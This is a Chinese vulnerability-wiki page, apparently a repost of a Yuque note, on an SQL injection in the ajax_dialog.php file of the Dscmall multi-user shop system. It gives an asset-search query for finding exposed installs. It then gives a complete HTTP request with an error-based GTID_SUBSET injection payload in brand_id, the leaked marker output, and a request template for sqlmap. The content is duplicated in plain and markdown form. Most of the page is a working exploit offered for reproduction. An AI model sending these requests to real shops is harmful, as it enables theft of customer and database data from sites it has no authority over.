fofamini-wiki

登录白背景

源码

大商创多用户商城系统ajax_dialog存在SQL注入漏洞

一、漏洞简介

大商创多用户商城系统是上海商创网络科技旗下推出的一款B2B2C多用户商城系统，可以为企业搭建新零售电商平台，覆盖PC商城、小程序商城、APP商城、微商城等多个终端，满足跨境电商、社交电商、s2b2c供应链等多种电商模式。大商创多用户商城系统前台ajax_dialog文件存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

二、影响版本

大商创多用户商城系统

三、资产测绘

hunterapp.name="Dscmall"
特征

四、漏洞复现

GET /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=1 AND GTID_SUBSET(CONCAT(0x71716a6271,(SELECT (ELT(4764=4764,1))),0x7170716a71),4764)&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: real_ipd=43.198.104.154; dsc_real_ip=43.198.104.154; ECS_ID=caa864f5a2579377c4e39d5518a8e0a807d91019; ECS[visit_times]=1; province=22; city=286; district=0; street=1; street_area=1; session_id_ip=43.198.104.154_caa864f5a2579377c4e39d5518a8e0a8; Hm_lvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825; Hm_lpvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825
Upgrade-Insecure-Requests: 1

qqjbq1qpqjq

sqlmap

GET /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=1&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: real_ipd=43.198.104.154; dsc_real_ip=43.198.104.154; ECS_ID=caa864f5a2579377c4e39d5518a8e0a807d91019; ECS[visit_times]=1; province=22; city=286; district=0; street=1; street_area=1; session_id_ip=43.198.104.154_caa864f5a2579377c4e39d5518a8e0a8; Hm_lvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825; Hm_lpvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/zm8tllf5knickhwm

# 大商创多用户商城系统ajax_dialog存在SQL注入漏洞

# 一、漏洞简介
大商创多用户商城系统是上海商创网络科技旗下推出的一款B2B2C多用户商城系统，可以为企业搭建新零售电商平台，覆盖PC商城、小程序商城、APP商城、微商城等多个终端，满足跨境电商、社交电商、s2b2c供应链等多种电商模式。大商创多用户商城系统前台ajax_dialog文件存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。

# 二、影响版本

- 大商创多用户商城系统

# 三、资产测绘

- hunter`app.name="Dscmall"`
- 特征

![image.png](./img/Bis--hb6CgUnG_KY/1711603894454-6d5712a5-a421-4dfd-b176-6c88fd45be26-441059.png)

# 四、漏洞复现
```
GET /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=1 AND GTID_SUBSET(CONCAT(0x71716a6271,(SELECT (ELT(4764=4764,1))),0x7170716a71),4764)&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: real_ipd=43.198.104.154; dsc_real_ip=43.198.104.154; ECS_ID=caa864f5a2579377c4e39d5518a8e0a807d91019; ECS[visit_times]=1; province=22; city=286; district=0; street=1; street_area=1; session_id_ip=43.198.104.154_caa864f5a2579377c4e39d5518a8e0a8; Hm_lvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825; Hm_lpvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825
Upgrade-Insecure-Requests: 1
```
![image.png](./img/Bis--hb6CgUnG_KY/1711617398137-cce136f1-6e35-46d3-83b5-19d1cf19c907-516699.png)
```
qqjbq1qpqjq
```
sqlmap
```
GET /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=1&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: real_ipd=43.198.104.154; dsc_real_ip=43.198.104.154; ECS_ID=caa864f5a2579377c4e39d5518a8e0a807d91019; ECS[visit_times]=1; province=22; city=286; district=0; street=1; street_area=1; session_id_ip=43.198.104.154_caa864f5a2579377c4e39d5518a8e0a8; Hm_lvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825; Hm_lpvt_1abd18f2b2abf273be5b81fd42f63a90=1711603825
Upgrade-Insecure-Requests: 1
```
![image.png](./img/Bis--hb6CgUnG_KY/1711604098165-8ff32db5-5e9f-48c5-b7e6-4ee91a7e19e1-596984.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zm8tllf5knickhwm>